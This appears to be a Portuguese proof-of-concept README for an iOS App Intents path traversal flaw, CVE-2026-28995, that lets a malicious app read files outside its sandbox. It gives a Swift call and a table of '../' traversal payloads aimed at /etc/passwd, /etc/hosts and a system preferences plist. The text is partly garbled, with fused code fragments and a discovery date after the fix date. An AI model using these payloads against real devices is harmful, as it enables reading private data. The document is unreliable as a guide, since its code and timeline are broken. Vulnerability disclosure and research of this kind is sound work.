
# CVE-2026-28995 Prova de Conceito para CVE-2026-28995 — Vulnerabilidade de Path Traversal no App Intents em iOS 26.4.2 e versões anteriores.
Prova de Conceito para CVE-2026-28995 — Vulnerabilidade de Path Traversal no App Intents no iOS 26.4.2 e anteriores.
Esta vulnerabilidade permite que um aplicativo malicioso leia qualquer arquivo fora de sua sandbox por meio do App Intents. A causa raiz é a validação insuficiente de caminho no framework App Intents da Apple.
Versões afetadas: iOS 26.4.2 e anteriores
Corrigido em: iOS 26.5 (11 de maio de 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
Caminho Lê ../../../../../../../../../../../../../etc/passwd Senhas dos usuários ../../../../../../../../../../../../../etc/hosts Arquivo hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Preferências do sistema
Se o caminho apontar para um diretório, a função retorna:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
CVE-2026-28995.swift ao projeto.readCve(path:) com o caminho alvo.Descoberta: 1º de julho de 2026
Corrigida em: iOS 26.5 (11 de maio de 2026)